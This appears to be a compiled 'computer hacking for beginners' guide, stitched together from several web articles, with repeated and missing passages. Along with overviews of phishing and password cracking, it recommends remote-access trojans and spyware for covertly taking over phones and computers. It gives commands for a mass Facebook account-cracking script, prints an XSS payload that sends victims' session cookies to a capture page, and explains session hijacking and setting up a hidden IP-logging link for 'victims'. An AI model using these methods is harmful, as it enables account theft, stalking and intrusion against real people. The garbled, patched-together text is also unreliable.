Professional Documents
Culture Documents
Puter Hacking
Puter Hacking
By
Williams Evelyn
Contents
Guide To Computer Hacking..........................
Introduction...................................................
'Grey Hat’.......................................................
What is an IP address?................................
How to find out someone’s IP address?....
Conclusion.................................................
Introduction
They can be an individual like you or me. They can work solo or be
employed by an organization for good or for ill. Often, they look to alter
security systems to achieve their goal. There are many organizations that
hire hackers as a part of their staff. These hackers use their skills to
find vulnerabilities in the organization’s security. This is done to find and fix
the weaknesses and prevent malicious hackers from breaking into the security
system.
Types of Hackers White, black, and grey refer to the relationship between the
hacker and the systems they are attacking.
Black Hat Hackers
The term “black hat” originated from Western movies, where the bad guys
wore black hats and the good guys wore white hats. A black-hat hacker is an
individual who attempts to gain unauthorized entry into a system or network
to exploit them for malicious reasons.
Hackers Grey hats exploit networks and computer systems in the way that
black hats do, but do so without any malicious intent, disclosing all loopholes
and vulnerabilities to law enforcement agencies or intelligence agencies.
Usually, grey-hat hackers surf the net and hack into computer systems to
notify the administrator or the owner that their system/network contains one
or more vulnerabilities that must be fixed immediately. Grey hats may also
extort the hacked, offering to correct the defect for a nominal fee.
Most Popular Hacking Technique -
Phishing
91% of data breaches come in the form of phishing, making it the most
exploited form of social engineering. Phishing is a type of cybercrime in
which emails are sent to the target in order to lure individuals to provide
personal information, banking and credit card details, email or social media
account passwords, or other confidential information.
Impersonation
Vishing
Vishing attacks are where an attacker will call into the target organization and
attempt to gain information and credentials over the phone. Another vishing
scam is where the attacker attempts to get the person on the other end of the
phone to perform some action on their PC.
These actions include running desktop scripts and viewing infected websites.
These attacks are difficult to monitor and trace and unfortunately, employees
working in HR departments, customer service, sales, and marketing, etc. are
highly vulnerable to these attacks. From 2012 to 2016, a group of cyber
criminals ran a massive IRS vishing scam.
During these four years, more than 15,000 victims in the United States lost
“hundreds of millions” of dollars to this sophisticated scam, and more than
50,000 individuals had their personal information compromised.
Smishing
Smishing is a portmanteau of “SMS phishing” which is similar to phishing
but is performed through text messages. Smishing criminals normally send
messages to contact numbers that they obtain through various black-hat
techniques like web-crawling, data breaches, or random number generators.
The messages sent by scammers use different techniques to get you to share
the information they are after. They may promise coupons or discounts on
desirable products or they may pose as your bank looking to verify your
account details. You may also receive texts from suspicious numbers like
“5000” or other numbers linked to email-to-text services which could be
automated.
There are different ways to install rootkits in a victim’s system, the most
famous of them being social engineering and phishing attacks.
Once rootkits are installed in the system, it secretly allows the hacker
to access and control the system, giving them the opportunity to bring the
system down or steal crucial data.
Keyloggers
This is a specially designed tool that logs or records every key pressed on a
system. Keyloggers record every keystroke by clinging to the API
(application programming interface) when typed through the computer
keyboard.
The recorded file then gets saved, which includes data like usernames,
website visit details, screenshots, opened applications, etc.
Keyloggers can capture credit card numbers, personal messages, mobile
numbers, passwords, and other details as long as they are typed.
John The Ripper (JTR) This software is designed to crack open some of the
most complicated passwords, as it can crack passwords ‘offline.’ JTR takes
different text string samples, commonly referred to as ‘wordlists,’ that
contain complex and popular words found in the dictionary or real passwords
which were cracked before.
This tool uses both the key and encryption algorithm and compares the output
to the encrypted string. JTR can also be used to perform a variety of
alterations towards dictionary attacks.
This extremely popular tool is often referred to as just ‘Cain.’ At its core, the
Cain and Abel Password Hacking Tool is used to recover passwords for
Microsoft Windows but can also be used as a password cracking tool by
hackers and criminals worldwide. THC Hydra This tool is similar to JTR,
except for the fact that THC Hydra works online.
This kind of attack is executed via a website interface that attempts to issue
SQL commands through a database to hack usernames, passwords, and other
database information. Web applications and websites that are poorly coded
are prone to SQL injection attacks because these web-based applications
contain user-input fields (such as search and login pages, product and support
request forms, comments section, etc.) that are vulnerable and can be easily
hacked by manipulating the codes.
The Guessing Game As the name suggests, this technique relies completely
on guessing the password of a user. Passwords like ‘password’, ‘qwerty’,
‘admin’, ‘default’, your name, or even your birthday are commonly used to
set default passwords. If the user has not changed the default password or if
the user is careless while setting a new password, then they can be hacked
easily.
Brute Force Attack
A brute force attack is one of the most common techniques used by hackers
and cybercriminals against web applications. The main focus of such an
attack is to gain access to user accounts using a trial-and-error technique to
guess a user’s password or personal identification number (PIN).
A brute force attack methodically tries one password after another until the
attacker successfully logs in to the target account. For example, the
attacker will use automated tools to try Password, then Password1,
Password2, Password3, etc. and iterate through every possible option within a
defined keyspace (a-z, A-Z, 0-1, etc.) By using bots to test random
combinations of lower and upper case alphabets and numbers to generate the
right password to your account in a couple of seconds, the attacker can gain
access to your account!
There is a similar attack technique known as reverse brute force attack where
instead of hacking a specific user, the hacker attempts to hack multiple
accounts using a single commonly-used password.
Dictionary Attack
Wordlists are available for nearly every language (real and fictional) and are
even separated into genres or themes. For example, if your server is named
Gandalf, then a Middle Earth dictionary file that contains words and
languages from the Lord of the Rings books and movies might be effective.
The best way to deter a dictionary attack is to use a multiple-word (random
combination of lowercase, uppercase characters with numerals) password..
Hacking have taken over everything with the growing technology. Each day
new technology gadget and gears are getting introduced in the market. Few
years back there wasn’t a concept of mobile phone but now every kid is
having a smartphone in their pocket. Big giant ordinary television
transformed into slim and smart LEDs. Computers with tons of equipments
have been packed into a small box with powerful things inside.
With the technology evolution, threats to privacy also have raised to peak.
Every new gadget opens more doors to the intruders and hackers and threat to
your privacy. There’s not a single machine which can guarantee hundred
percent of security. Every day hundreds of devices get hacked and
confidential information is leaked to the world.
LEARN HOW TO HACK FOR BEGINNERS FREE
There’s thousands of devices which make threat to online privacy and tons of
ways to penetrate into these devices. Explore all the major hack type which
might affect your privacy. Learn how to hack for beginners free and secure
from all these type of hacks.
1. COMPUTER HACKING
Computer is the one of the main device that opened up the big gates to the
hacking world. All the personal activities and business matters have been
moved to the computers. Each company migrated from the ordinary business
management to the centralized computer management system for their
business activities. With the rise of computers in the business industry, it
made confidential information more open to the hackers and intruders.
Computers can be hacked so easily and can get all the personal data leaked
with just few simple techniques. There’s one reason why hacking a computer
is very easy and simple than the other devices because most of the
organization doesn’t train their employees for the complete computer
operations and security measurements. Every company should give proper
training to the employee for a secure system.
So, how computers can be hacked? Well, there’s tons of ways a computer can
be hacked. Some needs physical access to the machine while some can hack a
computer remotely. There’s are most common way hackers use to get into a
computer is through a tool known as RAT (Remote Administration Tool).
There’s tons of remote administration tools in the market that can easily let
intruder hack into a computer remotely. Some most popular are:
Nanocore
Blackshades
NjRAT
JSpy
DarkComet
You can explore a list of all the top remote administration tools of 2020. As
most the beginners don’t know how to work with these tools. Well, to make it
easier for the newbies we have made some complete step by step tutorials to
hack a computer remotely with these RATs that can lead to learn how to hack
for beginners free. You can check out this how to hack a computer remotely
with njrat or even can learn hacking a computer remotely with Kali Linux as
well .
There are some other ways as well to hack into the computers but this is the
most common method which hackers use to get into a remote computer. And
plus point is this method has a huge success ratio.
2. SMARTPHONE HACKING
Mobile phone have evolved to the next level and became smart with the
passage of time. As we all know these smartphones have taken over all the
things which we were used to do on a computer. Now smartphones gives you
all of your computer operations in your hand. Sending an email, managing
business meetings, official video conferences and meeting as well
entertainment like watching movies, playing games and all the other things
are now accessible through a smartphone.
Questions rises how these smartphones can be hacked? Well answer is very
straight forward and easy. Smartphones can be hacked through various
methods but like the computer hacking, smartphones can be hacked through
remote administration tools easily and that’s the reason this method is very
popular and most common that every intruder tr to get into a remote mobile
phone using some android rats.
There’s tons of remote administration tools in the market that can easily let
intruder hack into a computer remotely. Some most popular are:
AndroRAT
SpyMax
DroidJack
SpyNote
Dendroid
You can explore a list of all the top android remote administration tools of
2020. As most the beginners don’t know how to work with these tools. It
might be tricky for most of the users to hack a smartphone using these tools.
So to overcome this issue, we have made complete step by step tutorials on
how to hack a smartphone remotely. You can explore the following tutorials
to learn how to hack for beginners free.
You would probably learn all to hack a smartphone with these complete step
by step tutorials designed for the beginners as well for the pros. Also explore
the list of 25 top Android hacking apps of 2020.
3. FACEBOOK HACKING
Facebook is the world’s giant social network where each day millions of
people post and make conversations with their friends and family. Everybody
uses facebook for chatting with their buddies and what if these conversations
can be hacked and leaked to the open world? It might become scary if any
confidential information get leaked.
There’s variety of other methods as well but these are the most common with
highest success ratio.
4. WEBSITE HACKING
Online information works on the websites also known as www (world wide
web). All the internet is a combination of different networks which host
websites. These websites share information with the world. There’s various
type of websites some are personal while other are for business. Every
website over the internet can be a victim of the attack. Each day hundreds of
the websites get hacked and it’s user’s data is leaked.
If a website’s data gets into the wrong hands it might make a real hard
problem. Question is how these website are hacked? Answer isn’t that simple
to this type of hacking as websites are hosted on different networks and to
hack into a website is a bit difficult unlike the computer hacking.
There are plenty of other ways but these are the most commonly used website
hacking methods. If a website is powered with WordPress then you can check
out the following dedicated ways to hack a wordpress based website.
Hope these articles will give a wide angle of understanding and you will learn
all about website hacking with these most popular methods to hack a website.
As data is transmitted through the WiFi in the air it opens many security
loopholes as you network can be accessed or hacked for free internet. Data
packets can be captures and personal or confidential information can get into
dirty hands which might put in serious trouble.
There’s tons of software and tools which let you get into someone’s wireless
network and can help you to capture packets as well. You can check out few
of the most popular wireless hacking related tools and tutorials.
How to Hack a Wifi Password
Aircrack-ng
There’s plenty of other tools and apps for wifi hacking and analysis.
6. IP HACKING
IP (Internet Protocol) address is the unique address allocated to the each user
over the internet. Every user over the internet has a unique IP address that no
other can have all over the world. In simple world, it’s like a home address
that no other can have the same address as yours. And data is trasmmitted
over the IP address among different machines.
IP address can be hacked easily that can leak your connection information as
well your home location from where you accessing the internet. Anybody can
get to your home if he know your IP and can track down like just in
hollywood movies. There’s many ways to garb someone’s IP address.
Some of best ip grabbers out can check out in this article. And if you are
playing the games and wanted to know your opponent players IP, you can use
the Octosniff Xbox IP sniffer. Even you can find out the IP address of the
skype users by their username and can know from where they are originally
connected. You can downloaad skype resolver that can resolve skype
username IP addresses.
The latest way to hack Facebook
In this article we will try to hack Facebook accounts using the latest dark fb
on termux.
This update is the latest mass dark fb script, you don't need to log in.
The latest anti check points fb hack script is the latest dark fb script.
As usual, to use the latest dark fb script, there are several modules that must
be installed, namely:
If so, proceed to the installation of the latest Termux Facebook hack script
anti check points.
Please see the command to install Facebook hack tools at the following link.
Next, run the command below to use the latest dark fb script:
cd Sensei
python2 main.py
[01] Crack Using Mobile Phone Enter command 01 to hack Facebook using
your mobile number
[02] Crack Using Email and enter command 02 to hack facebook account
using email address
[03] Crack From Friendslist & Public [LOGIN] select 03 if you are going to
hack the target’s Facebook account or from the list of friends (be careful to
check points, OK!)
Now choose which country you will hack the facebook account with.
These 3 digit numbers will later function to hack Facebook accounts using
the phone numbers of the 3 numbers
For example, the number you are going to hack Facebook is +628123987
***** so we enter the number 123 (3 numbers behind +628 ....)
This Facebook hack tool will try to log into 2000 accounts using numbers
beginning with +628123 **** ?.
That’s the latest way to hack Facebook to hack someone else’s fb account
100% works.
How to Hack a Website: Hacking Websites Online Example
More people have access to the internet than ever before. This has prompted
many organizations to develop web-based applications that users can use
online to interact with the organization. Poorly written code for web
applications can be exploited to gain unauthorized access to sensitive data
and web servers.
In this tutorial you will learn how to hack websites, and we will introduce
you to web application hacking techniques and the counter measures you can
put in place to protect against such attacks.
What is a web application? What are Web Threats?
Most web applications are hosted on public servers accessible via the
Internet. This makes them vulnerable to attacks due to easy accessibility. The
following are common web application threats.
SQL Injection – the goal of this threat could be to bypass login algorithms,
sabotage the data, etc.
Denial of Service Attacks– the goal of this threat could be to deny legitimate
users access to the resource
Cross Site Scripting XSS– the goal of this threat could be to inject code that
can be executed on the client side browser.
Form Tampering – the goal of this threat is to modify form data such as
prices in e-commerce applications so that the attacker can get items at
reduced prices.
Code Injection – the goal of this threat is to inject code such as PHP, Python,
etc. that can be executed on the server. The code can install backdoors, reveal
sensitive information, etc.
Defacement– the goal of this threat is to modify the page been displayed on a
website and redirecting all page requests to a single page that contains the
attacker’s message.
How to protect your Website against hacks
An organization can adopt the following policy to protect itself against web
server attacks.
Form tempering – this can be prevented by validating and verifying the user
input before processing it.
In this website hacking practical scenario, we are going to hijack the user
session of the web application located at www.techpanda.org. We will use
cross site scripting to read the cookie session id then use it to impersonate a
legitimate user session.
The assumption made is that the attacker has access to the web application
and he would like to hijack the sessions of other users that use the same
application. The goal of this attack could be to gain admin access to the web
application assuming the attacker’s access account is a limited one.
Getting started
Open http://www.techpanda.org/
If you have logged in successfully, then you will get the following dashboard
<a href=#
onclick=\"document.location=\'http://techpanda.org/snatch_sess_id.php?
c=\'+escape\(document.cookie\)\;\">Dark</a>
HERE,
The above code uses JavaScript. It adds a hyperlink with an onclick event.
When the unsuspecting user clicks the link, the event retrieves the PHP
cookie session ID and sends it to the snatch_sess_id.php page together with
the session id in the URL.
Since the cross site script code is stored in the database, it will be loaded
everytime the users with access rights login
Let’s suppose the administrator logins and clicks on the hyperlink that says
Dark
He/she will get the window with the session id showing in the URL.
Note: the script could be sending the value to some remote server where the
PHPSESSID is stored then the user redirected back to the website as if
nothing happened.
Note: the value you get may be different from the one in this webpage
hacking tutorial, but the concept is the same.
The flowchart below shows the steps that you must take to complete this
exercise.
You will need Firefox web browser for this section and Tamper Data add-on
You will get the following Window. Note: If the Windows is not empty, hit
the clear button
The pop-up window has three (3) options. The Tamper option allows you to
modify the HTTP header information before it is submitted to the server.
Click on it
Copy the PHP session ID you copied from the attack URL and paste it after
the equal sign. Your value should now look like this
PHPSESSID=2DVLTIPP2N8LDBN11B2RA76LM2
Click on OK button
Mutiyah found that when users asked for a password reset via Instagram’s
web interface, the site would email a reset link to the user’s email account.
Mutiyah found that when users asked for a password reset via Instagram’s
web interface, the site would email a reset link to the user’s email account.
After a few minutes of testing Mutiyah couldn’t find any bugs, and so turned
his attention instead to how smartphone users recover access to their
Instagram accounts.
What Mutiyah found was that Instagram offered the option for users locked
out of their accounts to request that a six-digit secret security code be sent to
their mobile phone number or email account. If that passcode is entered, a
user can regain access to their Instagram account.
In theory, if a hacker could enter the six-digit security code they would be
able to break into the Instagram account (and reset the password locking out
the legitimate owner.)
Mutiyah realised that all a hacker would need to do was enter the correct six
digit code – a code that could be any combination between 000000 and
999999 – within the ten minute window Instagram would accept the code
before expiring it.
Of course, the likes of Facebook and Instagram aren’t going to simply sit
quietly as an automated script tries a brute force attack to guess the correct
security code. Instead they have rate-limiting in place to detect when multiple
attempts have been made to get past the security check and slow down
subsequent attempts – meaning the ten minute window of opportunity
expires.
In Mutiyah’s tests he discovered that when he cycled through 1000 attempts
to guess an Instagram account’s security codes, 250 of them went through
and the subsequent 750 requests were rate limited.
However, after a few days of testing the researcher was able to discover that
Instagram’s rate limiting mechanism could be bypassed by rotating IP
addresses (in other words, not using the same computer to brute force the
recovery code) and sending concurrently from different IP addresses..
Mutiyah says that he used 1000 different machines and IPs to achieve easy
concurrency, and sent 200,000 requests in his tests. He shared a YouTube
video with Facebook and Instagram’s security team to demonstrate the attack
in action:
Of course, 200,000 requests isn’t quite the million requests that would be
necessary to guarantee the correct recovery passcode would be entered to
allow an Instagram account to be hijacked.
It’s easy to imagine that a technique like this would be very attractive to
many hackers interested in compromising Instagram accounts, and they
might be prepared to pay much more than the $30,000 Muthiyah received in
the form of a bug bounty.
All internet users are reminded to better secure their online accounts with
strong, unique passwords and to enable two-factor authentication wherever
possible.
The Best Way to Hack A Twitter Account
After a dozen unsuccessful hacker attempts, you feel nervous and irritated
trying to hack into a Twitter account again and again. This is where special
hacking software and keyloggers can help you complete the secret mission.
PanSpy is such a powerful mobile phone tracking application that enables
you to access someone's Twitter account secretly. This app can be used for
many purposes as it has many features as compared to any other spy apps.
You can use this application for hacking messages, location, contacts, call
logs, Keylogger, Apps, E-mails and much more on any Android devices
including Samsung, Huawei, HTC, Oppo, Sony, LG that is running on
Android version 5.0 or later.
After successfully subscribed the service, you will get a download link,
simply download and setup the PanSpy app. Then login your PanSpy
account, and follow the instructions given to set and give the app permission
to access data on the monitored mobile phone. Once you completed all
process and started the service, you can choose to delete the app icon or keep
it on the home screen.
Now, turn back to computer Control Panel, you have complete unrestricted
access to the phone and you can easily hack twitter account. To get the
Twitter password, simply use PanSpy’s Keylogger feature. However, that's
not it, you can also use it to hack Viber, Snapchat, WhatsApp, Line,
WhatsApp, etc.
Accessing a wireless network
The device as well as you will need to be within the transmission radius of a
wireless network access point (a WiFi router)
But if the network is password protected like most, then you’ll need its
password to gain access.
Wireless Network Authentication WEP & WPA
WEP and WPA are two of the most commonly used authentication
techniques in a wireless network. Understanding these two is good for
building a solid foundation before learning how to hack into a wireless
network.
It will also help you gather the required information regarding the access
point.
WEP
WEP (Wired Equivalent Privacy) is a security algorithm for IEEE 802. It was
developed with the intention to overcome the data confidentiality issues with
the traditional wired connection. It gave better data protection by encrypting
the data transmitted to avoid eavesdropping.
Open System Authentication (OSA) – OSA helps you gain access to any
WEP network as well as receive files that aren’t encrypted
WPA
In addition to the above, there are various types of attacks that can
compromise computer network security that can be useful in both types of
hacking.
Understanding these attacks will not only help you understand how to hack
into a network but also learn cybersecurity. Moreover, it will also help you
become an ethical hacker.
Tools used for hacking wireless networks
Here’s a list of some of the most popular tools used to hamper computer
network security:
Aircrack
AirSnort
Kismet
WireShark
CoWPatty
Wifiphisher
KisMac
Reaver
Secondly, ensure that you are in the range of a network that you wish to hack
and try and connect.
The decoder will show encryption type, SSID and the password that was once
used to access the network.
Securing wireless networks
Now that you know how to hack a WiFi network, it’s time to know about a
few steps you can take to avoid someone hacking your WiFi. After all, you
cannot become an ethical hacker without knowing how to hack and how to
prevent a hack.
Allowing only registered MAC addresses can restrict Access to the network.
Maybe someone scared you claiming to know your IP address. On the other
hand, you could be the one trying to scare a friend by getting his IP address.
Or, maybe, you just want to hear the truth about hacking IP address. Look no
further, because in this guide we will give you all the truth. We will explain
you how to hack IP addresses by following this agenda:
After reading this guide, you will be able to find out the IP address of
potentially anyone, silently.
Is this legal?
In other words, you are identified by your IP address over the Internet.
Typically, your Internet provider assigns a public IP address to your router in
your house. When your devices in your home network want to send traffic
over the Internet, they will use that public IP address (shared among all of
them).
The communication over the Internet happens with packets. Each piece of
data is put in a packet, you can think of it as a letter. On the envelope, you
always write source and destination IP addresses. The Internet will take care
of delivering the packet to the right destination. Now, as you can see, if you
send traffic out you will write your IP as source IP. This is the only way the
other part can know it, and send some traffic back.
Am I in danger?
It depends, but in most cases, you aren’t. As from the paragraph above,
knowing someone else’s IP is legitimate. You need it to send traffic back.
What if your IP address ends up in the wrong hands? Just by knowing your IP
address, nobody can harm you. However, they can start to scan your PC and
see if you have vulnerabilities they can use to gain access to your data. We
will get to that later.
How to find out someone’s IP address?
The Internet is full of poor content about hacking IP addresses. You might
read about hacking IP addresses with Skype and get excited about that, but
since 2017 this is not possible anymore. So, for this article, we are going to
use the best way to hack an IP address. We are going to use the only way that
depends uniquely on you, not third-party services. Because of that, it will
always work.
The idea behind our technique is simple. You basically give your victim a
link: they can open it with their mobile, PC, or any sort of device. On that
link, they will see an image of your choice (we recommend using a fun one).
However, your system will also track automatically their IP address and more
information, like the browser they are using and their operating system.
While this happens, they will see the fun image and have a laugh about it.
They have no way of knowing that you are tracking their IP address.
You want to give your victim a valid link to click, and it must be valid online.
Therefore, we need to register a website. There are a lot of free services
online to register a website, and among them, we have chosen x10 hosting.
Go to their website and register a new account.
As a first thing, they will ask you to select a domain image. Use a credible
one for the kind of images you want to share.
Continue with the registration and verify your email. Once you complete the
process, you will end up on the homepage where you will have to create a
website. Now you are going to say “Wait, I thought we already created
that!”… well, sort of. Until now, we created the name. Now, we have to
prepare the software running behind it.
The home will look like the one below. From there, just click the green Add
Website button on the top right.
A quick wizard will open. From there, we have to tune a few items. Before
everything else, select “Custom Website” website. Then, as a website name,
write something that reminds the website, like its domain name. As the last
thing, leave the address path empty. Then, click on Add Website.
Create the website, then select “Continue to my website” on the next page.
Congratulation, we are almost there!
Now your website is ready. All we need to do is uploading the script that will
take care of saving IP addresses and delivering the images to the user.
Fortunately, you don’t need to write that script on your own: instead, we did
it for you. It uses a PHP file, three HTAccess files, and two folders.
Our IPFinder script comes in a useful zip package that you can download for
free by using the link below. Just click on it and download the zip file.
Now that you have it, don’t even unzip it. We will do that on the website
directly: move on to the next step.
From the website pages, select the File Manager option. This will open a new
window that looks similar to Explorer in Windows. A website is just a
collection of files on a public server. With this File Manager, you can have a
look at those files. To them, we need to add our script.
Once you are in the file manager, select Upload (1). This will open a new
window, where you can click “Browse” and search for the file you
downloaded. Select that compressed file (ipfinder.zip) and wait for the upload
to complete. Then, close this window and click Reload (2) in the previous
window.
Now you should see a new file in the list, right below “cgi-bin”. This is our
zipped package containing IPFinder, and we just need to extract it.
Select the ipfinder.zip so that its background turns blue. Then, from the top
menu, select Extract.
A new window will pop-up. Just click on Extract File(s) without changing
anything. Then, wait for the process to finish, and, as soon as it does, click
the Close button. You will have some more files and folders on your list. In
case you don’t, just hit the Reload button as we did previously.
At this point, I recommend you to delete the ipfinder.zip file. You don’t need
it anymore, as we have extracted its content. So, just click it and then click
the delete button at the top. This step is not mandatory, but it is a good
practice.
Maybe someone scared you claiming to know your IP address. On the other
hand, you could be the one trying to scare a friend by getting his IP address.
Or, maybe, you just want to hear the truth about hacking IP address. Look no
further, because in this guide we will give you all the truth. We will explain
you how to hack IP addresses by following this agenda:
Now your IPFinder is ready to go. How do we use it? It is very simple, as it
automatically creates the URL we need. Your URL to share with your
victims will be something like this one.
The image name is the name of the picture you uploaded, so in our case, this
is “meme.jpg”
The user ID is something you should select carefully. Here you can write any
combination of letters and numbers you want. Now we will see how to use it
IPFinder will save a new text file for each victim that sees the image in the
log folder. That file contains the date, time, and the User ID you specify. The
purpose of this field is to let you differentiate between users. Think about it,
what if you want to give the link to multiple people? How can you know
which IP corresponds to which person? You cant. With this approach, you
would send to John the link to /meme.jpg/john and to Alice the link to
/meme.jpg/alice. They will both see the same picture, but you will log their
IPs separately.
Browse the log folder. You will see some text files with the names explained
above. Open any of them and read their content (select it and click Edit). In
each, you will see something like this.
At this point, you have your IP finder in place. You shared some images, thus
getting some IP. You can know truly hack IP addresses, but you are still
wondering what can someone do with IP addresses. On the other hand, you
might be the one who believes to be hacked, and you want to know if you are
in real danger. Look no further, here we will tell you the ultimate truth about
what happens after you hack IP addresses.
I’ve heard stories about “hackers” who managed to extort money from
someone with this approach. They basically make them believe they had
access to their data and threatened to share some personal pictures or
something like that. The truth is, they didn’t even know if those pictures
really existed. However, they approached everyone with the same words. As
a result, they would scare the hell out of anyone holding such kind of
pictures. Of course, such activity is illegal.
Geolocating you
Only your service provider, and thus the police, can locate you precisely with
your home address. For the others, you need to get by with only knowing the
city or county.
Truly gain access to the device or to personal data
If someone knows your IP address, he can scan you. This means he can try to
detect the system you are running and your vulnerabilities. Now, since the
public IP address of yours is on your home router, they will do that for your
router. They will gain access to your router and, from that, they will adopt the
same approach to gain access to your PC.
This process is long and complex and requires a skilled hacker. However, it
always follows the same guidelines.
Find exposed services (with nmap) and try to detect the hardware and
software version with the TCP signature
Look for common exploits on the exposed services, or for that specific
hardware/software
Of course, the fourth step is so hard that many hackers will simply give up.
That step if for someone with skills and budget that wants to hack specifically
you.
Machlin walked us through two hacks using basic tools available to anyone.
Machlin's 'hacker tool kit' included a laptop with WiFi connectivity, and two
phones. One phone acts as a GSM modem for the laptop, the other phone is
Machlin's personal phone, which he used to receive information. A third
phone served as our target device, the phone that was 'under attack' in the
demonstration.
Machlin sent a simple SMS which invoked Internet Explorer on the attack
device. First, Machlin sent a graphic to the target phone that said "You have
been hacked" to show just how quick and easy it is to get into another user's
phone with SMS. In the second push, Machlin ran an application on the
attacked phone that could retrieve data. The SMS came back to Machlin's
phone with the attack phone's INSI number; the phone's unique ID. However,
Machlin noted the application could have just as easily have stolen a contact
list, either personal or corporate. He said it was also possible in this scenario
to push viruses to the device or even initiate a denial of service attack.
How to Hack a Smartphone, Part 2
Meir Machlin of Trust Digital continues his demonstration of how to hack a
smartphone.
This article covers all the basic and most commonly used hacked devices and
methods or strategies to perform the attack. This is a complete guide to learn
how to hack for beginners free of cost. This article makes the following terms
clear for the beginners to get started on the hack track.
For the newbie, it’s quite hard to find out from where he can get hands on
practice.